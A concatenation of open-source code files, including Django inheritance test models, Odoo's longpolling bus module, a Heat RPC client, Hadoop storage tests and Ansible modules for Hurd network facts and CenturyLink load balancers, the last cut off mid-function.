restaurant = models.ForeignKey(Restaurant, models.CASCADE)
def __str__(self):
return self.name
class Wholesaler(Supplier):
retailer = models.ForeignKey(Supplier, models.CASCADE, related_name='wholesale_supplier')
class Parent(models.Model):
created = models.DateTimeField(default=datetime.datetime.now)
class Child(Parent):
name = models.CharField(max_length=10)
class SelfRefParent(models.Model):
parent_data = models.IntegerField()
self_data = models.ForeignKey('self', models.SET_NULL, null=True)
class SelfRefChild(SelfRefParent):
child_data = models.IntegerField()
@python_2_unicode_compatible
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
class Meta:
ordering = ('-pub_date', 'headline')
def __str__(self):
return self.headline
class ArticleWithAuthor(Article):
author = models.CharField(max_length=100)
class M2MBase(models.Model):
articles = models.ManyToManyField(Article)
class M2MChild(M2MBase):
name = models.CharField(max_length=50)
class Evaluation(Article):
quality = models.IntegerField()
class Meta:
abstract = True
class QualityControl(Evaluation):
assignee = models.CharField(max_length=50)
@python_2_unicode_compatible
class BaseM(models.Model):
base_name = models.CharField(max_length=100)
def __str__(self):
return self.base_name
@python_2_unicode_compatible
class DerivedM(BaseM):
customPK = models.IntegerField(primary_key=True)
derived_name = models.CharField(max_length=100)
def __str__(self):
return "PK = %d, base_name = %s, derived_name = %s" % (
self.customPK, self.base_name, self.derived_name)
class AuditBase(models.Model):
planned_date = models.DateField()
class Meta:
abstract = True
verbose_name_plural = 'Audits'
class CertificationAudit(AuditBase):
class Meta(AuditBase.Meta):
abstract = True
class InternalCertificationAudit(CertificationAudit):
auditing_dept = models.CharField(max_length=20)
# Check that abstract classes don't get m2m tables autocreated.
@python_2_unicode_compatible
class Person(models.Model):
name = models.CharField(max_length=100)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
@python_2_unicode_compatible
class AbstractEvent(models.Model):
name = models.CharField(max_length=100)
attendees = models.ManyToManyField(Person, related_name="%(class)s_set")
class Meta:
abstract = True
ordering = ('name',)
def __str__(self):
return self.name
class BirthdayParty(AbstractEvent):
pass
class BachelorParty(AbstractEvent):
pass
class MessyBachelorParty(BachelorParty):
pass
# Check concrete -> abstract -> concrete inheritance
class SearchableLocation(models.Model):
keywords = models.CharField(max_length=256)
class Station(SearchableLocation):
name = models.CharField(max_length=128)
class Meta:
abstract = True
class BusStation(Station):
bus_routes = models.CommaSeparatedIntegerField(max_length=128)
inbound = models.BooleanField(default=False)
class TrainStation(Station):
zone = models.IntegerField()
class User(models.Model):
username = models.CharField(max_length=30, unique=True)
class Profile(User):
profile_id = models.AutoField(primary_key=True)
extra = models.CharField(max_length=30, blank=True)
# Check concrete + concrete -> concrete -> concrete
class Politician(models.Model):
politician_id = models.AutoField(primary_key=True)
title = models.CharField(max_length=50)
class Congressman(Person, Politician):
state = models.CharField(max_length=2)
class Senator(Congressman):
pass
| bsd-3-clause |
rotofly/odoo | addons/bus/bus.py | 325 | 7324 | # -*- coding: utf-8 -*-
import datetime
import json
import logging
import select
import threading
import time
import random
import simplejson
import openerp
from openerp.osv import osv, fields
from openerp.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT
_logger = logging.getLogger(__name__)
TIMEOUT = 50
#----------------------------------------------------------
# Bus
#----------------------------------------------------------
def json_dump(v):
return simplejson.dumps(v, separators=(',', ':'))
def hashable(key):
if isinstance(key, list):
key = tuple(key)
return key
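# e.g. hashable(['db_name', 'channel', 1]) -> ('db_name', 'channel', 1), so
# channel descriptions arriving as JSON lists become usable as dict keys in
# the dispatcher below (a sketch; actual channel shapes depend on the callers).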
class ImBus(osv.Model):
_name = 'bus.bus'
_columns = {
'id' : fields.integer('Id'),
'create_date' : fields.datetime('Create date'),
'channel' : fields.char('Channel'),
'message' : fields.char('Message'),
}
def gc(self, cr, uid):
timeout_ago = datetime.datetime.utcnow()-datetime.timedelta(seconds=TIMEOUT*2)
domain = [('create_date', '<', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
ids = self.search(cr, openerp.SUPERUSER_ID, domain)
self.unlink(cr, openerp.SUPERUSER_ID, ids)
def sendmany(self, cr, uid, notifications):
channels = set()
for channel, message in notifications:
channels.add(channel)
values = {
"channel" : json_dump(channel),
"message" : json_dump(message)
}
self.pool['bus.bus'].create(cr, openerp.SUPERUSER_ID, values)
cr.commit()
if random.random() < 0.01:
self.gc(cr, uid)
if channels:
with openerp.sql_db.db_connect('postgres').cursor() as cr2:
cr2.execute("notify imbus, %s", (json_dump(list(channels)),))
def sendone(self, cr, uid, channel, message):
self.sendmany(cr, uid, [[channel, message]])
def poll(self, cr, uid, channels, last=0):
# first poll return the notification in the 'buffer'
if last == 0:
timeout_ago = datetime.datetime.utcnow()-datetime.timedelta(seconds=TIMEOUT)
domain = [('create_date', '>', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
else:
# else returns the unread notifications
domain = [('id','>',last)]
channels = [json_dump(c) for c in channels]
domain.append(('channel','in',channels))
notifications = self.search_read(cr, openerp.SUPERUSER_ID, domain)
return [{"id":notif["id"], "channel": simplejson.loads(notif["channel"]), "message":simplejson.loads(notif["message"])} for notif in notifications]
class ImDispatch(object):
def __init__(self):
self.channels = {}
def poll(self, dbname, channels, last, timeout=TIMEOUT):
# Don't hang ctrl-c for a poll request; we need to bypass private
# attribute access because we don't know before starting the thread
# that it will handle a longpolling request
if not openerp.evented:
current = threading.current_thread()
current._Thread__daemonic = True
# rename the thread to avoid tests waiting for a longpolling
current.setName("openerp.longpolling.request.%s" % current.ident)
registry = openerp.registry(dbname)
# immediately return if past notifications exist
with registry.cursor() as cr:
notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last)
# or wait for future ones
if not notifications:
event = self.Event()
for c in channels:
self.channels.setdefault(hashable(c), []).append(event)
try:
event.wait(timeout=timeout)
with registry.cursor() as cr:
notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last)
except Exception:
# timeout
pass
return notifications
def loop(self):
""" Dispatch postgres notifications to the relevant polling threads/greenlets """
_logger.info("Bus.loop listen imbus on db postgres")
with openerp.sql_db.db_connect('postgres').cursor() as cr:
conn = cr._cnx
cr.execute("listen imbus")
cr.commit()
while True:
if select.select([conn], [], [], TIMEOUT) == ([],[],[]):
pass
else:
conn.poll()
channels = []
while conn.notifies:
channels.extend(json.loads(conn.notifies.pop().payload))
# dispatch to local threads/greenlets
events = set()
for c in channels:
events.update(self.channels.pop(hashable(c),[]))
for e in events:
e.set()
def run(self):
while True:
try:
self.loop()
except Exception, e:
_logger.exception("Bus.loop error, sleep and retry")
time.sleep(TIMEOUT)
def start(self):
if openerp.evented:
# gevent mode
import gevent
self.Event = gevent.event.Event
gevent.spawn(self.run)
elif openerp.multi_process:
# disabled in prefork mode
return
else:
# threaded mode
self.Event = threading.Event
t = threading.Thread(name="%s.Bus" % __name__, target=self.run)
t.daemon = True
t.start()
return self
dispatch = ImDispatch().start()
#----------------------------------------------------------
# Controller
#----------------------------------------------------------
class Controller(openerp.http.Controller):
""" Examples:
openerp.jsonRpc('/longpolling/poll','call',{"channels":["c1"],last:0}).then(function(r){console.log(r)});
openerp.jsonRpc('/longpolling/send','call',{"channel":"c1","message":"m1"});
openerp.jsonRpc('/longpolling/send','call',{"channel":"c2","message":"m2"});
"""
@openerp.http.route('/longpolling/send', type="json", auth="public")
def send(self, channel, message):
if not isinstance(channel, basestring):
raise Exception("bus.Bus only string channels are allowed.")
registry, cr, uid, context = request.registry, request.cr, request.session.uid, request.context
return registry['bus.bus'].sendone(cr, uid, channel, message)
# override to add channels
def _poll(self, dbname, channels, last, options):
request.cr.close()
request._cr = None
return dispatch.poll(dbname, channels, last)
@openerp.http.route('/longpolling/poll', type="json", auth="public")
def poll(self, channels, last, options=None):
if options is None:
options = {}
if not dispatch:
raise Exception("bus.Bus unavailable")
if [c for c in channels if not isinstance(c, basestring)]:
raise Exception("bus.Bus only string channels are allowed.")
return self._poll(request.db, channels, last, options)
# vim:et:
| agpl-3.0 |
gonzolino/heat | heat/rpc/listener_client.py | 10 | 1473 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client side of the heat worker RPC API."""
from oslo_config import cfg
import oslo_messaging as messaging
from heat.common import messaging as rpc_messaging
from heat.rpc import api as rpc_api
cfg.CONF.import_opt('engine_life_check_timeout', 'heat.common.config')
class EngineListenerClient(object):
"""Client side of the heat listener RPC API.
API version history::
1.0 - Initial version.
"""
BASE_RPC_API_VERSION = '1.0'
def __init__(self, engine_id):
_client = rpc_messaging.get_rpc_client(
topic=rpc_api.LISTENER_TOPIC,
version=self.BASE_RPC_API_VERSION,
server=engine_id)
self._client = _client.prepare(
timeout=cfg.CONF.engine_life_check_timeout)
def is_alive(self, ctxt):
try:
return self._client.call(ctxt, 'listening')
except messaging.MessagingTimeout:
return False
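# Typical use (a sketch): a peer engine probes liveness before reclaiming work
# owned by engine_id, e.g.
#   if not EngineListenerClient(engine_id).is_alive(ctxt):
#       ...take over the dead engine's stacks...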
| apache-2.0 |
pombredanne/metamorphosys-desktop | metamorphosys/META/analysis_tools/PYTHON_RICARDO/output_closures/scripts/load_inventor.py | 7 | 2996 | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 12 16:56:42 2013
@author: tgb
"""
from cStringIO import StringIO
import re
import numpy as np
def read_iv_file(f_name):
"""
Return the merged mesh from the Inventor file called ``f_name``.
The result is a dict with keys ``"x"``, ``"y"`` and ``"z"`` (1D numpy arrays of node
positions, concatenated over every point set found in the file) and ``"tris"`` (a numpy
array of index triples, one row per triangle, referencing the merged nodes).
"""
with open(f_name, "r") as iv_file:
point_sets = []
n_str = None
p_str = None
in_points = False
in_normals = False
for line in iv_file:
if in_points:
if "]" in line:
in_points = False
p_str.write(line[:line.find("]")])
point_sets.append(_get_points_tris(p_str.getvalue(),
n_str.getvalue()))
else:
p_str.write(line)
elif in_normals:
if "]" in line:
in_normals = False
n_str.write(line[:line.find("]")])
else:
n_str.write(line)
else:
if re.search(r"point\s+\[", line):
p_str = StringIO()
in_points = True
p_str.write(line[line.find("[") + 1:])
if re.search(r"vector\s+\[", line):
n_str = StringIO()
in_normals = True
n_str.write(line[line.find("[") + 1:])
total_verts = total_tris = 0
t_x = np.empty((0,), dtype=np.float32)
t_y = np.empty((0,), dtype=np.float32)
t_z = np.empty((0,), dtype=np.float32)
t_tris = np.zeros((0, 3), dtype=np.uint32)
for x, y, z, triangles in point_sets:
total_verts += len(x)
total_tris += len(triangles)
t_tris = np.concatenate((t_tris, triangles + len(t_x)))
t_x = np.concatenate((t_x, x))
t_y = np.concatenate((t_y, y))
t_z = np.concatenate((t_z, z))
return {"x" : t_x, "y" : t_y, "z" : t_z, "tris" : t_tris}
def _get_points_tris(point_set, norm_sets):
"""
Parse one ``point``/``vector`` block into coordinate arrays and a triangle list.
Returns a tuple ``(x, y, z, tris)``; consecutive vertex triples form the triangles.
"""
point_set = re.sub(r",\n", " ", point_set).split()
point_set = np.array([float(x) for x in point_set], dtype=np.float32)
point_set.shape = (point_set.size / 3, 3)
tris = np.arange(point_set.size / 3, dtype=np.uint32)
tris.shape = (tris.size / 3, 3)
return (point_set[:, 0], point_set[:, 1], point_set[:, 2], tris)
| mit |
Nextzero/hadoop-2.6.0-cdh5.4.3 | hadoop-mapreduce1-project/src/contrib/cloud/src/test/py/teststorage.py | 16 | 6086 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import simplejson as json
from StringIO import StringIO
from hadoop.cloud.storage import MountableVolume
from hadoop.cloud.storage import JsonVolumeManager
from hadoop.cloud.storage import JsonVolumeSpecManager
spec = {
"master": ({"size_gb":"8", "mount_point":"/", "device":"/dev/sdj",
"snapshot_id": "snap_1"},
),
"slave": ({"size_gb":"8", "mount_point":"/", "device":"/dev/sdj",
"snapshot_id": "snap_2"},
{"size_gb":"10", "mount_point":"/data1", "device":"/dev/sdk",
"snapshot_id": "snap_3"},
)
}
class TestJsonVolumeSpecManager(unittest.TestCase):
def test_volume_specs_for_role(self):
input = StringIO(json.dumps(spec))
volume_spec_manager = JsonVolumeSpecManager(input)
master_specs = volume_spec_manager.volume_specs_for_role("master")
self.assertEqual(1, len(master_specs))
self.assertEqual("/", master_specs[0].mount_point)
self.assertEqual("8", master_specs[0].size)
self.assertEqual("/dev/sdj", master_specs[0].device)
self.assertEqual("snap_1", master_specs[0].snapshot_id)
slave_specs = volume_spec_manager.volume_specs_for_role("slave")
self.assertEqual(2, len(slave_specs))
self.assertEqual("snap_2", slave_specs[0].snapshot_id)
self.assertEqual("snap_3", slave_specs[1].snapshot_id)
self.assertRaises(KeyError, volume_spec_manager.volume_specs_for_role,
"no-such-role")
def test_get_mappings_string_for_role(self):
input = StringIO(json.dumps(spec))
volume_spec_manager = JsonVolumeSpecManager(input)
master_mappings = volume_spec_manager.get_mappings_string_for_role("master")
self.assertEqual("/,/dev/sdj", master_mappings)
slave_mappings = volume_spec_manager.get_mappings_string_for_role("slave")
self.assertEqual("/,/dev/sdj;/data1,/dev/sdk", slave_mappings)
self.assertRaises(KeyError,
volume_spec_manager.get_mappings_string_for_role,
"no-such-role")
class TestJsonVolumeManager(unittest.TestCase):
def tearDown(self):
try:
os.remove("volumemanagertest.json")
except OSError:
pass
def test_add_instance_storage_for_role(self):
volume_manager = JsonVolumeManager("volumemanagertest.json")
self.assertEqual(0,
len(volume_manager.get_instance_storage_for_role("master")))
self.assertEqual(0, len(volume_manager.get_roles()))
volume_manager.add_instance_storage_for_role("master",
[MountableVolume("vol_1", "/",
"/dev/sdj")])
master_storage = volume_manager.get_instance_storage_for_role("master")
self.assertEqual(1, len(master_storage))
master_storage_instance0 = master_storage[0]
self.assertEqual(1, len(master_storage_instance0))
master_storage_instance0_vol0 = master_storage_instance0[0]
self.assertEqual("vol_1", master_storage_instance0_vol0.volume_id)
self.assertEqual("/", master_storage_instance0_vol0.mount_point)
self.assertEqual("/dev/sdj", master_storage_instance0_vol0.device)
volume_manager.add_instance_storage_for_role("slave",
[MountableVolume("vol_2", "/",
"/dev/sdj")])
self.assertEqual(1,
len(volume_manager.get_instance_storage_for_role("master")))
slave_storage = volume_manager.get_instance_storage_for_role("slave")
self.assertEqual(1, len(slave_storage))
slave_storage_instance0 = slave_storage[0]
self.assertEqual(1, len(slave_storage_instance0))
slave_storage_instance0_vol0 = slave_storage_instance0[0]
self.assertEqual("vol_2", slave_storage_instance0_vol0.volume_id)
self.assertEqual("/", slave_storage_instance0_vol0.mount_point)
self.assertEqual("/dev/sdj", slave_storage_instance0_vol0.device)
volume_manager.add_instance_storage_for_role("slave",
[MountableVolume("vol_3", "/", "/dev/sdj"),
MountableVolume("vol_4", "/data1", "/dev/sdk")])
self.assertEqual(1,
len(volume_manager.get_instance_storage_for_role("master")))
slave_storage = volume_manager.get_instance_storage_for_role("slave")
self.assertEqual(2, len(slave_storage))
slave_storage_instance0 = slave_storage[0]
slave_storage_instance1 = slave_storage[1]
self.assertEqual(1, len(slave_storage_instance0))
self.assertEqual(2, len(slave_storage_instance1))
slave_storage_instance1_vol0 = slave_storage_instance1[0]
slave_storage_instance1_vol1 = slave_storage_instance1[1]
self.assertEqual("vol_3", slave_storage_instance1_vol0.volume_id)
self.assertEqual("/", slave_storage_instance1_vol0.mount_point)
self.assertEqual("/dev/sdj", slave_storage_instance1_vol0.device)
self.assertEqual("vol_4", slave_storage_instance1_vol1.volume_id)
self.assertEqual("/data1", slave_storage_instance1_vol1.mount_point)
self.assertEqual("/dev/sdk", slave_storage_instance1_vol1.device)
roles = volume_manager.get_roles()
self.assertEqual(2, len(roles))
self.assertTrue("slave" in roles)
self.assertTrue("master" in roles)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
pshen/ansible | lib/ansible/module_utils/facts/network/hurd.py | 192 | 3142 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.module_utils.facts.network.base import Network, NetworkCollector
class HurdPfinetNetwork(Network):
"""
    This is a GNU Hurd specific subclass of Network. It uses fsysopts to
    get the IP address and supports only pfinet.
"""
platform = 'GNU'
_socket_dir = '/servers/socket/'
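    # Illustrative (assumed) fsysopts output that populate() parses below, e.g.:
    #   /hurd/pfinet --interface=/dev/eth0 --address=192.168.0.2 \
    #     --netmask=255.255.255.0 --address6=fe80::1/64
    # Only tokens of the form --key=value are consumed; other tokens are ignored.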
def populate(self, collected_facts=None):
network_facts = {}
fsysopts_path = self.module.get_bin_path('fsysopts')
if fsysopts_path is None:
return network_facts
socket_path = None
        for family in ('inet', 'inet6'):
            link = os.path.join(self._socket_dir, family)
if os.path.exists(link):
socket_path = link
break
# FIXME: extract to method
# FIXME: exit early on falsey socket_path and un-indent whole block
if socket_path:
rc, out, err = self.module.run_command([fsysopts_path, '-L', socket_path])
# FIXME: build up a interfaces datastructure, then assign into network_facts
network_facts['interfaces'] = []
for i in out.split():
if '=' in i and i.startswith('--'):
k, v = i.split('=', 1)
# remove '--'
k = k[2:]
if k == 'interface':
# remove /dev/ from /dev/eth0
v = v[5:]
network_facts['interfaces'].append(v)
network_facts[v] = {
'active': True,
'device': v,
'ipv4': {},
'ipv6': [],
}
current_if = v
elif k == 'address':
network_facts[current_if]['ipv4']['address'] = v
elif k == 'netmask':
network_facts[current_if]['ipv4']['netmask'] = v
elif k == 'address6':
address, prefix = v.split('/')
network_facts[current_if]['ipv6'].append({
'address': address,
'prefix': prefix,
})
return network_facts
class HurdNetworkCollector(NetworkCollector):
_platform = 'GNU'
_fact_class = HurdPfinetNetwork
| gpl-3.0 |
kovacsbalu/ansible-modules-extras | cloud/centurylink/clc_loadbalancer.py | 49 | 34308 | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
#
DOCUMENTATION = '''
module: clc_loadbalancer
short_description: Create or delete shared loadbalancers in CenturyLink Cloud.
description:
    - An Ansible module to create or delete shared loadbalancers in CenturyLink Cloud.
version_added: "2.0"
options:
name:
description:
- The name of the loadbalancer
required: True
description:
description:
- A description for the loadbalancer
required: False
default: None
alias:
description:
- The alias of your CLC Account
required: True
location:
description:
- The location of the datacenter where the load balancer resides in
required: True
method:
description:
      - The balancing method for the load balancer pool
required: False
default: None
choices: ['leastConnection', 'roundRobin']
persistence:
description:
- The persistence method for the load balancer
required: False
default: None
choices: ['standard', 'sticky']
port:
description:
- Port to configure on the public-facing side of the load balancer pool
required: False
default: None
choices: [80, 443]
nodes:
description:
- A list of nodes that needs to be added to the load balancer pool
required: False
default: []
status:
description:
- The status of the loadbalancer
required: False
default: enabled
choices: ['enabled', 'disabled']
state:
description:
- Whether to create or delete the load balancer pool
required: False
default: present
choices: ['present', 'absent', 'port_absent', 'nodes_present', 'nodes_absent']
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: Create Loadbalancer
hosts: localhost
connection: local
tasks:
- name: Actually Create things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.123', 'privatePort': 80 }
state: present
- name: Add node to an existing loadbalancer pool
hosts: localhost
connection: local
tasks:
- name: Actually Create things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.234', 'privatePort': 80 }
state: nodes_present
- name: Remove node from an existing loadbalancer pool
hosts: localhost
connection: local
tasks:
- name: Actually Create things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.234', 'privatePort': 80 }
state: nodes_absent
- name: Delete LoadbalancerPool
hosts: localhost
connection: local
tasks:
- name: Actually Delete things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.123', 'privatePort': 80 }
state: port_absent
- name: Delete Loadbalancer
hosts: localhost
connection: local
tasks:
- name: Actually Delete things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.123', 'privatePort': 80 }
state: absent
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
notes:
    - To use this module, you must set the below environment variables, which enable access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
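# A hedged note: _set_clc_credentials_from_env() below reads these variables at
# run time; a hypothetical shell setup before invoking the module might be
#   export CLC_V2_API_USERNAME=jdoe
#   export CLC_V2_API_PASSWD=secret
# or, token-based: CLC_V2_API_TOKEN plus CLC_ACCT_ALIAS.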
__version__ = '${version}'
from time import sleep
from distutils.version import LooseVersion
try:
import requests
except ImportError:
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
try:
import clc as clc_sdk
from clc import APIFailedResponse
except ImportError:
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
class ClcLoadBalancer:
clc = None
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
self.lb_dict = {}
if not CLC_FOUND:
self.module.fail_json(
msg='clc-python-sdk required for this module')
if not REQUESTS_FOUND:
self.module.fail_json(
msg='requests library is required for this module')
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Execute the main code path, and handle the request
:return: none
"""
changed = False
result_lb = None
loadbalancer_name = self.module.params.get('name')
loadbalancer_alias = self.module.params.get('alias')
loadbalancer_location = self.module.params.get('location')
loadbalancer_description = self.module.params.get('description')
loadbalancer_port = self.module.params.get('port')
loadbalancer_method = self.module.params.get('method')
loadbalancer_persistence = self.module.params.get('persistence')
loadbalancer_nodes = self.module.params.get('nodes')
loadbalancer_status = self.module.params.get('status')
state = self.module.params.get('state')
if loadbalancer_description is None:
loadbalancer_description = loadbalancer_name
self._set_clc_credentials_from_env()
self.lb_dict = self._get_loadbalancer_list(
alias=loadbalancer_alias,
location=loadbalancer_location)
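        # Dispatch on the requested state; each ensure_* helper below is
        # idempotent and returns whether a change was actually made.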
if state == 'present':
changed, result_lb, lb_id = self.ensure_loadbalancer_present(
name=loadbalancer_name,
alias=loadbalancer_alias,
location=loadbalancer_location,
description=loadbalancer_description,
status=loadbalancer_status)
if loadbalancer_port:
changed, result_pool, pool_id = self.ensure_loadbalancerpool_present(
lb_id=lb_id,
alias=loadbalancer_alias,
location=loadbalancer_location,
method=loadbalancer_method,
persistence=loadbalancer_persistence,
port=loadbalancer_port)
if loadbalancer_nodes:
changed, result_nodes = self.ensure_lbpool_nodes_set(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port,
nodes=loadbalancer_nodes)
elif state == 'absent':
changed, result_lb = self.ensure_loadbalancer_absent(
name=loadbalancer_name,
alias=loadbalancer_alias,
location=loadbalancer_location)
elif state == 'port_absent':
changed, result_lb = self.ensure_loadbalancerpool_absent(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port)
elif state == 'nodes_present':
changed, result_lb = self.ensure_lbpool_nodes_present(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port,
nodes=loadbalancer_nodes)
elif state == 'nodes_absent':
changed, result_lb = self.ensure_lbpool_nodes_absent(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port,
nodes=loadbalancer_nodes)
self.module.exit_json(changed=changed, loadbalancer=result_lb)
def ensure_loadbalancer_present(
self, name, alias, location, description, status):
"""
Checks to see if a load balancer exists and creates one if it does not.
:param name: Name of loadbalancer
:param alias: Alias of account
:param location: Datacenter
:param description: Description of loadbalancer
:param status: Enabled / Disabled
:return: (changed, result, lb_id)
changed: Boolean whether a change was made
result: The result object from the CLC load balancer request
lb_id: The load balancer id
"""
changed = False
result = name
lb_id = self._loadbalancer_exists(name=name)
if not lb_id:
if not self.module.check_mode:
result = self.create_loadbalancer(name=name,
alias=alias,
location=location,
description=description,
status=status)
lb_id = result.get('id')
changed = True
return changed, result, lb_id
def ensure_loadbalancerpool_present(
self, lb_id, alias, location, method, persistence, port):
"""
Checks to see if a load balancer pool exists and creates one if it does not.
:param lb_id: The loadbalancer id
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param method: the load balancing method
:param persistence: the load balancing persistence type
:param port: the port that the load balancer will listen on
:return: (changed, group, pool_id) -
changed: Boolean whether a change was made
result: The result from the CLC API call
pool_id: The string id of the load balancer pool
"""
changed = False
result = port
if not lb_id:
return changed, None, None
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if not pool_id:
if not self.module.check_mode:
result = self.create_loadbalancerpool(
alias=alias,
location=location,
lb_id=lb_id,
method=method,
persistence=persistence,
port=port)
pool_id = result.get('id')
changed = True
return changed, result, pool_id
def ensure_loadbalancer_absent(self, name, alias, location):
"""
Checks to see if a load balancer exists and deletes it if it does
:param name: Name of the load balancer
:param alias: Alias of account
:param location: Datacenter
:return: (changed, result)
changed: Boolean whether a change was made
result: The result from the CLC API Call
"""
changed = False
result = name
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
if not self.module.check_mode:
result = self.delete_loadbalancer(alias=alias,
location=location,
name=name)
changed = True
return changed, result
def ensure_loadbalancerpool_absent(self, alias, location, name, port):
"""
Checks to see if a load balancer pool exists and deletes it if it does
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer listens on
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
result = None
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
changed = True
if not self.module.check_mode:
result = self.delete_loadbalancerpool(
alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id)
else:
result = "Pool doesn't exist"
else:
result = "LB Doesn't Exist"
return changed, result
def ensure_lbpool_nodes_set(self, alias, location, name, port, nodes):
"""
        Checks to see if the provided list of nodes exists for the pool
        and sets the nodes if any in the list do not exist yet
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer will listen on
:param nodes: The list of nodes to be updated to the pool
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
result = {}
changed = False
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
nodes_exist = self._loadbalancerpool_nodes_exists(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes_to_check=nodes)
if not nodes_exist:
changed = True
result = self.set_loadbalancernodes(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes=nodes)
else:
result = "Pool doesn't exist"
else:
result = "Load balancer doesn't Exist"
return changed, result
def ensure_lbpool_nodes_present(self, alias, location, name, port, nodes):
"""
Checks to see if the provided list of nodes exist for the pool and add the missing nodes to the pool
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer will listen on
:param nodes: the list of nodes to be added
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
